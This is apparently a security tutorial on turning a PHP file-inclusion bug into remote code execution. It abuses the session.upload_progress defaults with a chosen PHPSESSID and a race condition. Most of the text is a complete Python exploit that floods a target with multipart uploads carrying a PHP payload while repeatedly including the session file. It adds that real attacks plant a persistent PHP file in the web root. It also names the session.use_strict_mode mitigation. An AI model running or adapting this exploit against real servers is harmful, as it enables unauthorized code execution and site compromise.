File inclusion & race condition
2022-06-30 20:25:00 【Whoa, whoa, whoa, whoa, whoa, whoa】
session.upload_progress
Like open_basedir, allow_url_fopen and allow_url_include, session.upload_progress is a PHP feature whose behaviour is controlled from php.ini. The settings that matter here (shown with their default values):
session.upload_progress.enabled = On
session.upload_progress.cleanup = On
session.upload_progress.prefix = "upload_progress_"
session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
session.upload_progress.enabled turns upload-progress tracking on or off.
session.upload_progress.cleanup controls whether the progress entry is removed from the session as soon as PHP has finished reading the POST body.
session.upload_progress.prefix is prepended to the session key under which the progress data is stored.
session.upload_progress.name is the name of the POST field that must be present in the multipart body for tracking to happen; the value of that field is appended to the prefix to form the session key.
With session.upload_progress.enabled set to On, uploading a file to the server makes PHP record the details of the upload (start time, bytes processed, the file name, and so on) in the session.
That raises a precondition: how does the session get initialized in the first place, and how does its content end up in a file on disk that we can include?
Note that session.use_strict_mode defaults to 0 in php.ini. In that case the client can choose its own session id: sending Cookie: PHPSESSID=Lxxx makes PHP create the file /tmp/sess_Lxxx (session.save_path defaults to /tmp on most installs). The session is now initialized, and the upload-progress data is written into /tmp/sess_Lxxx.
When session.upload_progress.cleanup is On, the data is still written to the file during the upload, but it is removed again as soon as the upload finishes. What then?
This is where a race condition comes in: use Python multithreading to keep uploading while repeatedly including the session file.
Using session.upload_progress for RCE
Step one:
Normally a script calls session_start() to open the session. If the target never calls session_start(), does the technique fall apart? This is where a further configuration item comes in: session.use_strict_mode.
It is off by default, which means we can define the session id ourselves. If the request carries Cookie: PHPSESSID=haha, PHP creates a session file named sess_haha and initializes the session itself while handling the upload, without the script ever calling session_start(). It then builds a key from the configured session.upload_progress.prefix plus the value of the POST field named by session.upload_progress.name, and writes that key into the session file. With the configuration above, the key is upload_progress_ followed by whatever value we send in the PHP_SESSION_UPLOAD_PROGRESS field, so that value (and the uploaded file's name, which is recorded alongside it) is where the payload goes.
Step two:
Because session.upload_progress.cleanup is On by default, the progress entry is deleted from the session file the moment the upload ends. So how do we get the malicious code included?
By winning the race: use Burp Intruder or a Python script to send upload requests continuously, and at the same time send the file-inclusion requests in the same way. One of the includes will land while the session file still holds the payload.
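The whole procedure (chosen PHPSESSID, a multipart body whose PHP_SESSION_UPLOAD_PROGRESS field carries the payload, and concurrent upload/include loops) as an added Python example; it is not code from the original post. The target URL, the `file` GET parameter, the save path /tmp and the echo-only payload are assumptions. The race loop takes plain callables so it can be exercised without a live server; the `__main__` section wires it to a real target with urllib.

```python
import re
import threading
import urllib.request
import uuid

# Hypothetical target: a script doing include($_GET['file']) with
# session.upload_progress at its defaults (assumption, not from the post).
TARGET = "http://127.0.0.1/index.php"
SESSION_ID = "Lxxx"        # the PHPSESSID we pick, as in the post
SAVE_PATH = "/tmp"         # default session.save_path
MARKER = "UPLOAD_PROGRESS_OK"
# The PHP_SESSION_UPLOAD_PROGRESS value becomes part of the session key and
# is written verbatim into sess_<id>; placeholder payload (assumption).
PAYLOAD = f"<?php echo '{MARKER}'; ?>"


def session_file_path(session_id, save_path=SAVE_PATH):
    """Path PHP's files save handler uses for a given id (prefix 'sess_')."""
    # The files handler only accepts ids made of [A-Za-z0-9,-].
    if not re.fullmatch(r"[A-Za-z0-9,-]+", session_id):
        raise ValueError("session id contains characters PHP will refuse")
    return f"{save_path}/sess_{session_id}"


def build_upload_request(url, session_id, payload, padding=512 * 1024):
    """Multipart POST that makes PHP write the payload into the session file.

    PHP_SESSION_UPLOAD_PROGRESS must precede the file part. The padding keeps
    the body in flight longer, which widens the window before cleanup runs.
    """
    boundary = "----race" + uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"\r\n\r\n'
        f"{payload}\r\n"
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    body = head + b"A" * padding + f"\r\n--{boundary}--\r\n".encode()
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    req.add_header("Cookie", f"PHPSESSID={session_id}")
    return req


def build_include_request(url, session_id, param="file"):
    """GET that includes the session file through the vulnerable parameter."""
    return urllib.request.Request(
        f"{url}?{param}={session_file_path(session_id)}", method="GET")


def race(upload, include, marker, attempts=300, workers=4):
    """Run uploads and includes concurrently until an include shows marker.

    upload() and include() are callables (include returns a response body).
    Returns the winning body, or None if no include saw the marker.
    """
    stop = threading.Event()
    hits = []

    def uploader():
        while not stop.is_set():
            try:
                upload()
            except Exception:
                pass  # connection errors are expected noise while racing

    def includer():
        for _ in range(attempts):
            if stop.is_set():
                return
            try:
                body = include()
            except Exception:
                continue
            if marker in body:
                hits.append(body)
                stop.set()
                return

    up = [threading.Thread(target=uploader, daemon=True) for _ in range(workers)]
    inc = [threading.Thread(target=includer, daemon=True) for _ in range(workers)]
    for t in up + inc:
        t.start()
    for t in inc:
        t.join()
    stop.set()           # includers are done, release the uploaders
    for t in up:
        t.join()
    return hits[0] if hits else None


def fetch(req):
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    hit = race(
        lambda: fetch(build_upload_request(TARGET, SESSION_ID, PAYLOAD)),
        lambda: fetch(build_include_request(TARGET, SESSION_ID)),
        MARKER,
    )
    print("included session file" if hit else "race lost, run again")
```

In practice the payload is usually one that writes a persistent file (for example a small PHP file under the web root), so a single won race is enough and the loop can stop; the echo marker above only proves the include happened. Note also that session.use_strict_mode=1 defeats the chosen-id step entirely, and that the progress key is only written if the PHP_SESSION_UPLOAD_PROGRESS field comes before the file part in the body.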